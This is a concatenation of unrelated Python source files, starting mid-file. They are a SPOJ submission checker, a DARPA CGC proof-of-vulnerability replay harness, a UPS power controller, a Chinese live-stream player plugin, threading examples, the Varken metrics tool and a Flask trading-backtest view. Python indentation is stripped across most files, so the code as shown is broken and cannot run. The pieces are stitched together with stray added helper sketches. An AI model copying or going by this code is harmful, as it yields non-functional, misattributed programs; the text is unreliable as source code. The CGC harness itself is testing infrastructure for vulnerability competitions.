print "Oops !! %s.Don't get frustrated , Try again !" % status
extime , memory , lang = parse(htmltext , ID)
print "Execution Time : %s \t" % extime,
print "Memory Used : %s \t" % memory ,
print "Language : %s " % lang
return True
elif status.startswith("compilation"):
print
print "Oops !! Compilation Error "
print "Check your syntax !!"
return True
return False
def main(name,password,path,lang,code):
ID = test.style(name , password , path ,lang ,code)
if not ID :
return
ID = ID.strip()
status = ""
statusList =[]
print "Waiting for the response from the server !!"
url = "http://www.spoj.com/status/" + name
th_stop = threading.Event()
th = threading.Thread(target = wait , args=(1,th_stop))
th.daemon = True
try :
th.start()
for i in range(500):
status ,htmltext= get_status(url,ID)
if status in statusList:
pass
else :
if status.strip() == "waiting..":
pass
else :
statusList.append(status)
temp = status.replace(" ","")
temp = temp.replace(',',"")
if temp.isdigit() :
print "\n"
print "Your Score of the above problem : %s "% temp
status = "accepted"
if check(status , htmltext , ID):
break
print "\n"+status
time.sleep(1)
th_stop.set()
except Exception as error :
print error
if __name__ == '__main__':
main()
|
cb-replay-pov.py
|
#!/usr/bin/env python
"""
CB POV / Poll communication verification tool
Copyright (C) 2014 - Brian Caswell <bmc@lungetech.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
This tool allows for deterministic communication to a CGC Challenge Binary
using a Challenge Binary as input.
1 - http://testanything.org/
"""
import subprocess as sp
import multiprocessing as mp
import random
import argparse
import os
import signal
import struct
import threading
from common import IS_WINDOWS, Timeout, TimeoutError
import challenge_runner
def get_fd(fileobj):
""" Gets the file descriptor for a given fileobject
On Unix systems this returns the result of fileno()
On Windows systems, fileno() returns a HANDLE. This will open
that HANDLE and return a CRT file descriptor
"""
if IS_WINDOWS:
import msvcrt
return msvcrt.open_osfhandle(fileobj.fileno(), os.O_TEXT)
return fileobj.fileno()
class TestFailure(Exception):
""" Exception to be used by Throw(), to allow catching of test failures """
pass
class Throw(object):
"""Throw - Perform the interactions with a CB
This class implements the basic methods to interact with a CB, verifying
the interaction works as expected.
Usage:
a = Throw((source_ip, source_port), (target_ip, target_port), POV,
timeout, should_debug)
a.run()
Attributes:
cb_paths: List of paths to all cb executables
count: Number of actions performed
debug: Is debugging enabled
failed: Number of actions that did not work as expected
        passed: Number of actions that worked as expected
pov: POV, as defined by POV()
timeout: connection timeout
"""
def __init__(self, cb_paths, pov, timeout, debug, pov_seed):
self.cb_paths = cb_paths
self.pov = pov
self.debug = debug
self.timeout = timeout
self.pov_seed = pov_seed
def log(self, data):
print "# %s" % data
def count_bits_set(self, value):
count = 0
while value:
value &= value - 1
count += 1
return count
def read_all(self, fd, data_len):
data = ''
while len(data) < data_len:
read = os.read(fd, data_len - len(data))
assert len(read)
data += read
return data
def pov_negotiate(self, pipefd):
MIN_BITS = 0
if self.debug:
self.log("negotiating")
data = self.read_all(pipefd, 4)
pov_type = struct.unpack('<L', data)[0]
assert pov_type in [1, 2], 'invalid pov type'
self.log("negotiation type: %d" % pov_type)
if pov_type == 1:
data = self.read_all(pipefd, 12)
ipmask, regmask, regnum = struct.unpack('<LLL', data)
accept = True
if self.count_bits_set(ipmask) < MIN_BITS:
self.log('not enough bits in IP mask')
accept = False
if self.count_bits_set(regmask) < MIN_BITS:
self.log('not enough bits in REG mask')
accept = False
if regnum > 7:
self.log('invalid GPR')
accept = False
if accept:
ip = random.randint(0, 0xFFFFFFFF) & ipmask
reg = random.randint(0, 0xFFFFFFFF) & regmask
self.log('type 1 masks: %08x %08x' % (ipmask, regmask))
self.log('type 1 pov: %08x %08x %d' % (ip, reg, regnum))
pov_values = struct.pack('<LL', ip, reg)
os.write(pipefd, pov_values)
if pov_type == 2:
PAGE_ADDR = 0x4347C000
PAGE_LENGTH = 0x1000
PAGE_BYTES = 4
self.log("sending page location: %d, %d, %d" % (PAGE_ADDR, PAGE_LENGTH, PAGE_BYTES))
pov_location = struct.pack('<LLL', PAGE_ADDR, PAGE_LENGTH, PAGE_BYTES)
os.write(pipefd, pov_location)
if self.debug:
self.log("getting secret")
data = self.read_all(pipefd, 4)
self.log("secret value: %s" % data.encode('hex'))
if self.debug:
self.log('done')
def _launch_pov_unix(self, mainproc, pipe):
# NOTE: This is running a forked process, free to clobber fds
# This is mostly unchanged from the original source
if self.timeout > 0:
signal.alarm(self.timeout)
# Setup fds for communication
os.dup2(mainproc.stdout.fileno(), 0)
os.dup2(mainproc.stdin.fileno(), 1)
os.dup2(pipe.fileno(), 3)
if not self.debug:
null = os.open('/dev/null', 0)
os.dup2(null, 2)
os.close(null)
args = [self.pov]
if self.pov_seed:
args.append('seed=%s' % self.pov_seed)
# Launch the POV
os.execv(self.pov, args)
exit(-1)
def _launch_pov_win(self, mainproc, pipe):
import _subprocess as _sp
cmd = [self.pov]
if self.pov_seed:
cmd.append('seed=%s' % self.pov_seed)
# The pipe HANDLE isn't inheritable, make a duplicate that is
cur_proc = _sp.GetCurrentProcess()
inh_pipe = _sp.DuplicateHandle(cur_proc, # Source process
pipe.fileno(), # HANDLE
cur_proc, # Target process
0, # Desired access
1, # Inheritable
_sp.DUPLICATE_SAME_ACCESS) # Options
# Run the POV
pov_proc = sp.Popen(cmd,
# Passing the HANDLE value here through an environment variable
# libpov will grab this and open it in fd 3
# see: include/libpov/pov.c - DLLMain
env={'POV_FD': str(int(inh_pipe))},
# stdin/out connect to the cb directly
stdin=mainproc.stdout,
stdout=mainproc.stdin)
pov_proc.wait()
def launch_pov(self, mainproc, pipe):
if IS_WINDOWS:
# Can't pass process/pipe handles to another process here, using a thread
pov_runner = threading.Thread(target=self._launch_pov_win, args=(mainproc, pipe))
pov_runner.setDaemon(True)
else:
# Fork on unix systems so we can dup fds where we want them
pov_runner = mp.Process(target=self._launch_pov_unix, args=(mainproc, pipe))
pov_runner.start()
return pov_runner
def gen_seed(self):
""" Prepare the seed that will be used in the replay """
seed = os.urandom(48)
self.log("using seed: %s" % seed.encode('hex'))
return seed.encode('hex')
def run(self):
""" Iteratively execute each of the actions within the POV
Args:
None
Returns:
None
Raises:
AssertionError: if a POV action is not in the pre-defined methods
"""
self.log('%s' % (self.pov))
# Get the seed for the tests
seed = self.gen_seed()
# Launch the challenges
self.procs, watcher = challenge_runner.run(self.cb_paths, self.timeout, seed, self.log)
# Setup and run the POV
pov_pipes = mp.Pipe(duplex=True)
pov_runner = self.launch_pov(self.procs[0], pov_pipes[1])
if self.timeout > 0:
try:
with Timeout(self.timeout + 5):
self.pov_negotiate(get_fd(pov_pipes[0]))
except TimeoutError:
self.log('pov negotiation timed out')
else:
            self.pov_negotiate(get_fd(pov_pipes[0]))
if self.debug:
self.log('waiting')
# Wait for the POV to finish and results to get logged
pov_runner.join()
watcher.join()
self.log('END REPLAY')
return self.procs[0].returncode
def run_pov(cbs, pov, timeout, debug, pov_seed):
"""
Parse and Throw a POV/Poll
Arguments:
cbs: List of paths to all cb executables
pov: filename of the POV
timeout: How long the POV communication is allowed to take
debug: Flag to enable debug logs
pov_seed: the POV seed to use
Returns:
The number of passed tests
The number of failed tests
A list containing the logs
Raises:
Exception if parsing the POV times out
"""
thrower = Throw(cbs, pov, timeout, debug, pov_seed)
return thrower.run()
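# Hedged illustration of the type 1 negotiation wire format that
# Throw.pov_negotiate parses: the POV sends '<L' pov_type followed by '<LLL'
# (ipmask, regmask, regnum), and the replay tool answers with '<LL' (ip, reg).
# The constants below are arbitrary demonstration values.
def _example_type1_negotiation_bytes():
    request = struct.pack('<L', 1) + struct.pack('<LLL', 0xFFFFFFFF, 0xFFFFFFFF, 3)
    pov_type = struct.unpack('<L', request[:4])[0]
    ipmask, regmask, regnum = struct.unpack('<LLL', request[4:])
    response = struct.pack('<LL', 0x41414141 & ipmask, 0x42424242 & regmask)
    return pov_type, regnum, response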
def main():
""" Parse and Throw the POVs """
parser = argparse.ArgumentParser(description='Send CB based CGC Polls and POVs')
required = parser.add_argument_group(title='required arguments')
required.add_argument('--cbs', nargs='+', required=True,
help='List of challenge binaries to run on the server')
required.add_argument('files', metavar='pov', type=str, nargs='+',
help='pov file')
parser.add_argument('--timeout', required=False, type=int, default=15,
help='Connect timeout')
parser.add_argument('--debug', required=False, action='store_true',
default=False, help='Enable debugging output')
parser.add_argument('--negotiate', required=False, action='store_true',
default=False, help='The CB seed should be negotiated')
parser.add_argument('--pov_seed', required=False, type=str,
help='Specify the POV Seed')
args = parser.parse_args()
assert len(args.files)
for filename in args.files:
assert os.path.isfile(filename), "pov must be a file: %s" % repr(filename)
for pov in args.files:
status = run_pov(args.cbs, pov, args.timeout,
args.debug, args.pov_seed)
return status != 0
if __name__ == "__main__":
exit(main())
|
UPS_Main2.py
|
# ©2018 The Arizona Board of Regents for and on behalf of Arizona State University and the Laboratory for Energy And Power Solutions, All Rights Reserved.
#
# Universal Power System Controller
# USAID Middle East Water Security Initiative
#
# Developed by: Nathan Webster
# Primary Investigator: Nathan Johnson
#
# Version History (mm_dd_yyyy)
# 1.00 07_13_2018_NW
#
######################################################
# Import Libraries
from threading import Thread
from PWM_Controller import *
from Protection_Controller import *
from VFD_Controller import *
from SCIP_Controller import *
from SQL_Database_Controller import *
from Archive_Controller import *
from Initialization import *
# Declare Variables
# Run initialization to setup VFD and converter controls
Run_Initialization()
# UPS Control Threads
PWM_Thread = Thread(target=PWM_Controller_Main, args=("",))
#Protection_Thread = Thread(target=Protection_Controller_Main, args=("",))
#VFD_Thread = Thread(target=VFD_Controller_Main, args=("",))
#SCIP_Thread = Thread(target=SCIP_Controller_Main, args=("",))
#SQL_Thread = Thread(target=SQL_Database_Controller_Main, args=("",))
#Archive_Thread = Thread(target=Archive_Controller_Main,args=("",))
PWM_Thread.start()
#Protection_Thread.start()
#VFD_Thread.start()
#SCIP_Thread.start()
#SQL_Thread.start()
#Archive_Thread.start()
|
main.py
|
import traceback
import StellarPlayer
import importlib
import requests
import threading
import json
import time
import inspect
import os
import sys
from bs4 import BeautifulSoup as bs
from .sites import match
plugin_dir = os.path.dirname(__file__)
sys.path.append(plugin_dir) # for js2py
DEFAULT_IMAGE = 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQMAAADCCAMAAAB6zFdcAAAAQlBMVEX///+hoaGenp6ampr39/fHx8fOzs7j4+P8/Pyvr6/d3d3FxcX29va6urqYmJjs7OzU1NSlpaW1tbWtra3n5+e/v78TS0zBAAACkUlEQVR4nO3b63KCMBCGYUwUUVEO6v3fagWVY4LYZMbZnff51xaZ5jON7CZNEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQb5tvI8qzX4/nH84XG5Upfj2ir2V2E5fZ/XpIX9saMnhkYLIkiyRJjdgMoiEDMmiQgfwM8rSu77ew2wnPoLTmwdZBs0J2BuXrYckcQm4nOoP+WcmWAbcTnUHZPy9eA24nOoN7n0HI54ToDM5k8PjluwyqgNuJzqDoaugPg8gWZ4noDAYLwuIg75fLeeHHsjNIzrZJwWwW+0DNsmEWPjiEZ5AcD8ZUu8VZ8HyQMifvBdIz+PS33i8adu+7Qn4Gn1Tdupl7rlCfQb9seosK7RkcBy1o30iVZ5CPOtDW3WhQnsF13IV3v0p3BqfJRoSpXVepzmA/24+yqeMyzRm4tqOs44lSUwa3yfgOri25av5CPRnklR33VlPnrqSZV09qMsiqSWV082xOz1uPajJ49pTM/f115k6guWa6JGjJ4N1lt8fXN2rv/vysjFaSQdFXBc/KKF04ptFPliclGVR9Bu27XCyeVOkmy5OODAZN9rYyyip/AIPJ8qIig+PoXbf7YdPdncFoSdCQQT4ZceV+MhiFMBy0hgyu0yGvOLI17KwpyGBaHK5jtt0N5GcwLw7XZdB31sRn8O+ziqYro8Vn4CwOV+k6a9Iz+PwRsKC7h+gMfMXhKu/OmuwM/MXhKq8yWnYG/uJw5Uxoy2jRGZTBZ/jboxuSM1guDtdNhKazJjiDbNMe0AxzKUVnkO+jEJxBxNtJzWCTxlNLzSB8KehJ/H+mJGYAjaDjzj9SnHZRuXZiAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAECXP1XDHv7U4SNFAAAAAElFTkSuQmCC'
class MyPlugin(StellarPlayer.IStellarPlayerPlugin):
def __init__(self,player:StellarPlayer.IStellarPlayer):
super().__init__(player)
self.q = ''
self.result = [
]
self.favs = [
]
self.stop_flag = False
self.load_favs()
self.check_thread = None
self.danmu = None
self.page_url = ''
self.real_url = ''
self.danmuShow = True
def handleRequest(self, method, args):
if method == 'onPlay':
print('---------------onPlay')
url, = args
if self.real_url == url:
if self.player.getSnapshot:
time.sleep(2.0)
image = self.player.getSnapshot({'width': 100, 'height': 100})
for item in self.result:
if item['url'] == self.page_url:
item['image'] = 'data:image/png;base64,' + image
self.result = self.result
break
for item in self.favs:
if item['url'] == self.page_url:
print(f'update image {self.page_url}')
item['image'] = 'data:image/png;base64,' + image
self.favs = self.favs
self.save_favs()
break
if self.danmu:
self.danmu.stop()
self.danmu = None
self.danmu = self.create_damnu_client(self.page_url)
if self.danmu:
self.danmu.start(self.page_url, self.on_danmu)
self.danmu.run()
elif method == 'onStopPlay':
print('---------------onStop')
if self.danmu:
print('self.danmu.stop')
self.danmu.stop()
self.danmu = None
self.player.clearDanmu()
else:
print(f'handleRequest {method=} {args=}')
def show(self):
result_layout = [
[
{'type':'image', 'name':'image', 'width':120},
{'type':'space','width':10},
{
'group': [
{'type':'label','name':'name'},
{'type':'link','name':'url', 'height':20},
{'type':'link','name':'收藏','width':50, '@click': 'on_add_fav_click'},
],
'dir':'vertical',
}
]
]
favs_layout = [
[
{'type':'image', 'name':'image', 'width':120},
{'type':'space','width':10},
{
'group': [
{'type':'label','name':'name', 'height':20},
{'type':'link','name':'url', 'height':20},
{'type':'label', 'name':'online', 'height':20, 'matchParent':True},
{
'group': [
{'type':'link','name':'播放','width':50, 'matchParent':True, '@click': 'on_play_fav_click'},
{'type':'link','name':'删除','width':50, 'matchParent':True, '@click': 'on_del_fav_click'},
]
},
# {'group':
# [
# {'type':'button','name':'删除','width':60,'matchParent':True, '@click':'on_list_del_click'},
# {'type':'button','name':'删除2','width':60,'matchParent':True, '@click':'on_list_del_click'},
# {'type':'button','name':'删除3','width':60,'matchParent':True, '@click':'on_list_del_click'},
# ]
# },
],
'dir':'vertical',
}
]
]
controls = [
{
'group': [
{'type':'label','name':'直播间地址'},
{'type':'edit','name':'search','height':30, 'width':0.6, 'label': ' ', '@input': 'on_search_input', ':value': 'q'},
{'type':'button','name':'播放', 'height':30, 'width':0.1, '@click': 'on_play_click'},
{'type':'check', 'name':'显示弹幕', '@click': 'on_toggle_danmu_click', ':value': 'danmuShow'},
],
'height':30
},
{
'group': [
{'type':'list','name':'result', 'height': 80, 'itemheight':80, 'itemlayout': result_layout, ':value': 'result','marginSize':5},
{'type':'space', 'height':10 },
{'type':'label','name': '收藏列表', 'height':30},
{'type':'list','name':'favs', 'itemheight':80, 'itemlayout': favs_layout, ':value': 'favs','marginSize':5, 'separator': True},
],
'dir':'vertical',
'width': 1.0
},
]
if self.check_thread is None:
print("create checking thread")
self.check_thread = threading.Thread(target=self.check_thread_func, daemon=True)
self.check_thread.start()
self.player.showDanmu(self.danmuShow)
self.doModal('main', 800, 600, '看各种直播门户', controls)
def start(self):
super().start()
def stop(self):
self.stop_flag = True
super().stop()
def check_thread_func(self):
last = 0
while not self.stop_flag:
time.sleep(0.1)
            if time.time() - last > 60.0 * 5:  # check every 5 minutes
last = time.time()
print("thread loop")
for fav in self.favs:
if self.stop_flag:
break
time.sleep(0.1)
print(f"check {fav['url']}")
real_url, site = self.get_real_url(fav['url'])
print(f"check ret {real_url}")
fav['online'] = '在线' if real_url else '离线'
self.favs = self.favs
def danmu_thread_func(self, url):
pass
def create_damnu_client(self, url):
ret, site = match(url)
print(f'create_damnu_client {ret=} {site=}')
if ret:
danmu = site.get('danmu')
if danmu:
print(danmu)
module_name, attr_name = danmu.rsplit('.', 1)
module = importlib.import_module(f'..dmclient.{module_name}', package=__name__)
Cls = getattr(module, attr_name)
return Cls()
return None
def get_real_url(self, url):
def call_get_real_url(module, ret):
if hasattr(module, 'get_real_url'):
return module.get_real_url(ret)
for name, obj in inspect.getmembers(module):
if inspect.isclass(obj):
inst = obj(ret)
if hasattr(inst, 'get_real_url'):
return inst.get_real_url()
return False
ret, site = match(url)
if ret:
module_name = site['realurl']
print(f'get real url : {module_name}')
module = importlib.import_module(f'..real-url.{module_name}', package=__name__)
try:
real_url = call_get_real_url(module, ret)
return real_url, site
except Exception as e:
import traceback
traceback.print_exc()
return None, None
def play(self, url, caption, show_result=False):
try:
real_url, site = self.get_real_url(url)
if not real_url:
self.player and self.player.toast('main', '直播不存在或者未开播')
return
if 'key' in site:
if callable(site['key']):
real_url = site['key'](real_url)
else:
print(real_url)
real_url = real_url[site['key']]
hasattr(self.player, "clearDanmu") and self.player.clearDanmu()
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36', 'referer': url}
try:
self.player.play(real_url, caption=caption, headers=headers)
except:
self.player.play(real_url, headers=headers)
self.real_url = real_url
self.page_url = url
if show_result:
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
r = requests.get(url, headers = headers)
if r.status_code == 200:
soup = bs(r.content, 'html.parser')
title = soup.find('title')
self.result = [{
'name': title.string[:30],
'url': url,
'online': '在线',
'image': DEFAULT_IMAGE
}]
if self.player.setCaption :
self.player.setCaption(title.string)
except Exception as e:
import traceback
traceback.print_exc()
def on_danmu(self, message):
self.player.addDanmu(message)
def on_play_click(self, *args):
self.result = []
url = self.q
self.play(url, None, True)
def on_play_fav_click(self, page, listControl, item, itemControl):
url = self.favs[item]['url']
name = self.favs[item]['name']
self.play(url, name, False)
def on_add_fav_click(self, page, listControl, item, itemControl):
if len(self.result) == 0: return
url = self.result[0]['url']
if len(list(filter(lambda x: x['url'] == url, self.favs))) == 0:
self.favs = self.result + self.favs
self.result = []
self.save_favs()
def on_del_fav_click(self, page, listControl, item, itemControl):
self.favs.pop(item)
self.favs = self.favs
self.save_favs()
def on_toggle_danmu_click(self, *a):
self.player.showDanmu(self.danmuShow)
print(f'{a=}, {self.danmuShow=}')
def save_favs(self):
f = open("favs.json", "w")
favs = []
for fav in self.favs:
favs.append({
'name': fav['name'],
'url': fav['url'],
'image': fav['image']
})
f.write(json.dumps(favs, indent=4))
f.close()
def load_favs(self):
try:
with open("favs.json") as f:
favs = json.loads(f.read())
for fav in favs:
fav['online'] = '正在检测'
if 'image' not in fav:
fav['image'] = DEFAULT_IMAGE
self.favs = favs
except FileNotFoundError:
pass
def newPlugin(player:StellarPlayer.IStellarPlayer,*arg):
plugin = MyPlugin(player)
return plugin
def destroyPlugin(plugin:StellarPlayer.IStellarPlayerPlugin):
plugin.stop()
|
Threads.py
|
import threading
import time
def worker():
print("Worker")
return
threads = []
for i in range(5):
t = threading.Thread(target=worker)
threads.append(t)
t.start()
print('')
def worker_a(num):
print ("Worker : " + str(num),end='\n')
return
threads_a = []
for i in range(5):
t = threading.Thread(target=worker_a,args=(i,))
threads_a.append(t)
t.start()
def worker_thread():
    print (threading.currentThread().getName() + ' Starting')
    time.sleep(2)
    print (threading.currentThread().getName() + ' Ending')
def my_service():
    print (threading.currentThread().getName() + ' Starting')
    time.sleep(3)
    print (threading.currentThread().getName() + ' Ending')
t = threading.Thread(name='worker_thread',target=worker_thread)
w = threading.Thread(name='my_service',target=my_service)
t.start()
w.start()
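# Hedged follow-up sketch: the snippets above start threads without waiting
# for them to finish. Joining each Thread blocks until its target returns,
# which is the usual way to make the main script wait for its workers, e.g.
# wait_for(threads) or wait_for(threads_a) after the loops above.
def wait_for(threads_to_join):
    for pending in threads_to_join:
        pending.join()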
|
Varken.py
|
import platform
import schedule
from time import sleep
from queue import Queue
from sys import version
from threading import Thread
from os import access, R_OK, getenv
from distro import linux_distribution
from os.path import isdir, abspath, dirname, join
from argparse import ArgumentParser, RawTextHelpFormatter
from logging import getLogger, StreamHandler, Formatter, DEBUG
from varken import structures # Needed to check version of python
from varken.ombi import OmbiAPI
from varken.unifi import UniFiAPI
from varken import VERSION, BRANCH
from varken.sonarr import SonarrAPI
from varken.radarr import RadarrAPI
from varken.iniparser import INIParser
from varken.dbmanager import DBManager
from varken.helpers import GeoIPHandler
from varken.tautulli import TautulliAPI
from varken.sickchill import SickChillAPI
from varken.varkenlogger import VarkenLogger
PLATFORM_LINUX_DISTRO = ' '.join(x for x in linux_distribution() if x)
def thread():
while schedule.jobs:
job = QUEUE.get()
a = job()
print(a)
if a is not None:
schedule.clear(a)
QUEUE.task_done()
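# Hedged sketch of the scheduling pattern used below: schedule never calls the
# API methods itself, it only enqueues them (via QUEUE.put) and the worker
# thread above drains the queue and invokes them. demo_job is a stand-in for
# the real *API.get_* methods and this helper is never called by Varken.
def _example_schedule_and_drain():
    demo_queue = Queue()
    def demo_job():
        return None  # a real job would query an API and write to InfluxDB
    schedule.every(30).seconds.do(demo_queue.put, demo_job).tag('demo-job')
    schedule.run_all()         # enqueue immediately, as done at startup below
    queued_job = demo_queue.get()
    queued_job()
    schedule.clear('demo-job')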
if __name__ == "__main__":
parser = ArgumentParser(prog='varken',
description='Command-line utility to aggregate data from the plex ecosystem into InfluxDB',
formatter_class=RawTextHelpFormatter)
parser.add_argument("-d", "--data-folder", help='Define an alternate data folder location')
parser.add_argument("-D", "--debug", action='store_true', help='Use to enable DEBUG logging')
opts = parser.parse_args()
DATA_FOLDER = abspath(join(dirname(__file__), 'data'))
templogger = getLogger('temp')
templogger.setLevel(DEBUG)
tempch = StreamHandler()
tempformatter = Formatter('%(asctime)s : %(levelname)s : %(module)s : %(message)s', '%Y-%m-%d %H:%M:%S')
tempch.setFormatter(tempformatter)
templogger.addHandler(tempch)
if opts.data_folder:
ARG_FOLDER = opts.data_folder
if isdir(ARG_FOLDER):
DATA_FOLDER = ARG_FOLDER
if not access(DATA_FOLDER, R_OK):
templogger.error("Read permission error for %s", DATA_FOLDER)
exit(1)
else:
templogger.error("%s does not exist", ARG_FOLDER)
exit(1)
# Set Debug to True if DEBUG env is set
enable_opts = ['True', 'true', 'yes']
debug_opts = ['debug', 'Debug', 'DEBUG']
if not opts.debug:
opts.debug = True if any([getenv(string, False) for true in enable_opts
for string in debug_opts if getenv(string, False) == true]) else False
# Initiate the logger
vl = VarkenLogger(data_folder=DATA_FOLDER, debug=opts.debug)
vl.logger.info('Starting Varken...')
vl.logger.info('Data folder is "%s"', DATA_FOLDER)
vl.logger.info(u"%s %s (%s%s)", platform.system(), platform.release(), platform.version(),
' - ' + PLATFORM_LINUX_DISTRO if PLATFORM_LINUX_DISTRO else '')
vl.logger.info(u"Python %s", version)
vl.logger.info("Varken v%s-%s", VERSION, BRANCH)
CONFIG = INIParser(DATA_FOLDER)
DBMANAGER = DBManager(CONFIG.influx_server)
QUEUE = Queue()
if CONFIG.sonarr_enabled:
for server in CONFIG.sonarr_servers:
SONARR = SonarrAPI(server, DBMANAGER)
if server.queue:
at_time = schedule.every(server.queue_run_seconds).seconds
at_time.do(QUEUE.put, SONARR.get_queue).tag(f"sonarr-{server.id}-get_queue")
if server.missing_days > 0:
at_time = schedule.every(server.missing_days_run_seconds).seconds
at_time.do(QUEUE.put, SONARR.get_missing).tag(f"sonarr-{server.id}-get_missing")
if server.future_days > 0:
at_time = schedule.every(server.future_days_run_seconds).seconds
at_time.do(QUEUE.put, SONARR.get_future).tag(f"sonarr-{server.id}-get_future")
if CONFIG.tautulli_enabled:
GEOIPHANDLER = GeoIPHandler(DATA_FOLDER)
schedule.every(12).to(24).hours.do(QUEUE.put, GEOIPHANDLER.update)
for server in CONFIG.tautulli_servers:
TAUTULLI = TautulliAPI(server, DBMANAGER, GEOIPHANDLER)
if server.get_activity:
at_time = schedule.every(server.get_activity_run_seconds).seconds
at_time.do(QUEUE.put, TAUTULLI.get_activity).tag(f"tautulli-{server.id}-get_activity")
if server.get_stats:
at_time = schedule.every(server.get_stats_run_seconds).seconds
at_time.do(QUEUE.put, TAUTULLI.get_stats).tag(f"tautulli-{server.id}-get_stats")
if CONFIG.radarr_enabled:
for server in CONFIG.radarr_servers:
RADARR = RadarrAPI(server, DBMANAGER)
if server.get_missing:
at_time = schedule.every(server.get_missing_run_seconds).seconds
at_time.do(QUEUE.put, RADARR.get_missing).tag(f"radarr-{server.id}-get_missing")
if server.queue:
at_time = schedule.every(server.queue_run_seconds).seconds
at_time.do(QUEUE.put, RADARR.get_queue).tag(f"radarr-{server.id}-get_queue")
if CONFIG.ombi_enabled:
for server in CONFIG.ombi_servers:
OMBI = OmbiAPI(server, DBMANAGER)
if server.request_type_counts:
at_time = schedule.every(server.request_type_run_seconds).seconds
at_time.do(QUEUE.put, OMBI.get_request_counts).tag(f"ombi-{server.id}-get_request_counts")
if server.request_total_counts:
at_time = schedule.every(server.request_total_run_seconds).seconds
at_time.do(QUEUE.put, OMBI.get_all_requests).tag(f"ombi-{server.id}-get_all_requests")
if server.issue_status_counts:
at_time = schedule.every(server.issue_status_run_seconds).seconds
at_time.do(QUEUE.put, OMBI.get_issue_counts).tag(f"ombi-{server.id}-get_issue_counts")
if CONFIG.sickchill_enabled:
for server in CONFIG.sickchill_servers:
SICKCHILL = SickChillAPI(server, DBMANAGER)
if server.get_missing:
at_time = schedule.every(server.get_missing_run_seconds).seconds
at_time.do(QUEUE.put, SICKCHILL.get_missing).tag(f"sickchill-{server.id}-get_missing")
if CONFIG.unifi_enabled:
for server in CONFIG.unifi_servers:
UNIFI = UniFiAPI(server, DBMANAGER)
at_time = schedule.every(server.get_usg_stats_run_seconds).seconds
at_time.do(QUEUE.put, UNIFI.get_usg_stats).tag(f"unifi-{server.id}-get_usg_stats")
# Run all on startup
SERVICES_ENABLED = [CONFIG.ombi_enabled, CONFIG.radarr_enabled, CONFIG.tautulli_enabled, CONFIG.unifi_enabled,
CONFIG.sonarr_enabled, CONFIG.sickchill_enabled]
if not [enabled for enabled in SERVICES_ENABLED if enabled]:
vl.logger.error("All services disabled. Exiting")
exit(1)
WORKER = Thread(target=thread)
WORKER.start()
schedule.run_all()
while schedule.jobs:
schedule.run_pending()
sleep(1)
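# Illustrative sketch (not part of Varken): the block above never runs collectors on the
# scheduler thread - schedule.every(...).do(QUEUE.put, <collector>) only enqueues them, and
# the worker thread executes them and unschedules any job that returns its own tag (for
# example after a fatal error). The demo_collector name and "demo" tag are hypothetical.
def _schedule_queue_worker_sketch():
    from queue import Queue
    from threading import Thread
    from time import sleep
    import schedule
    q = Queue()
    def demo_collector():
        # return a tag to make the worker unschedule this job, or None to keep it scheduled
        return None
    schedule.every(30).seconds.do(q.put, demo_collector).tag("demo")
    def worker():
        while schedule.jobs:
            job = q.get()
            tag = job()
            if tag is not None:
                schedule.clear(tag)
            q.task_done()
    Thread(target=worker, daemon=True).start()
    while schedule.jobs:
        schedule.run_pending()
        sleep(1)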
|
views.py
|
# encoding: UTF-8
from flask import render_template, flash, url_for, session, redirect, request, g, jsonify, send_file
from app import app, db,lm , celery
from flask_login import login_user, logout_user, current_user, login_required
from app.models import Post,User
from app.forms import LoginForm,EditForm,PostForm,SignUpForm,ChangeForm,SearchForm
import os
import random
import time
import path
import json
import datetime
from vnpy.trader.app.ctaStrategy.ctaBacktesting import BacktestingEngine
from vnpy.trader.app.ctaStrategy.strategy.strategyDemo import strategyDemo
from vnpy.trader.app.ctaStrategy.strategy.strategyHedge import strategyHedge
from datetime import datetime
import pymongo
from threading import Thread
from queue import Queue
import xlrd
import pandas as pd
from pandas.core.frame import DataFrame
from client import getStrategyStart , getlogin,getAccountInfo,getPositionInfo,pushStrategyVar
#from setting import gateway_setting_dict
import numpy as np
from werkzeug.utils import secure_filename
queue = Queue()
wsdl_url = "http://localhost:8000/?wsdl"
@lm.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
@app.before_request
def before_request():
g.user = current_user
if g.user.is_authenticated:
g.user.last_seen = datetime.utcnow()
db.session.add(g.user)
db.session.commit()
@app.route('/',methods=['GET'])
@app.route('/index', methods = ['GET'])
@app.route('/index/<int:page>', methods = ['GET'])
@login_required
def index(page = 1):  # page comes from the <int:page> route converter; print it to inspect the value if needed
posts=Post.query.filter_by(user_id= current_user.id).order_by(db.desc(Post.time)).paginate(page,3, False)
return render_template('index.html',title='Home',user = current_user,posts = posts)
@app.route('/user/<username>')
@login_required
def user(username,page = 1):
user = User.query.filter_by(username = username).first()
posts=Post.query.filter_by(user_id = user.id).order_by(db.desc(Post.time)).paginate(page,3, False)
return render_template('user.html',user = user,posts = posts)
def drawLine(title,df,col):
from pyecharts import Line
if title == "NetValue":
pic = "单位净值"
if title == "Margin":
pic = "保证金"
line=Line(pic)
dates=df.index
for name in df.columns:
line.add(name,dates,df.loc[:,name])
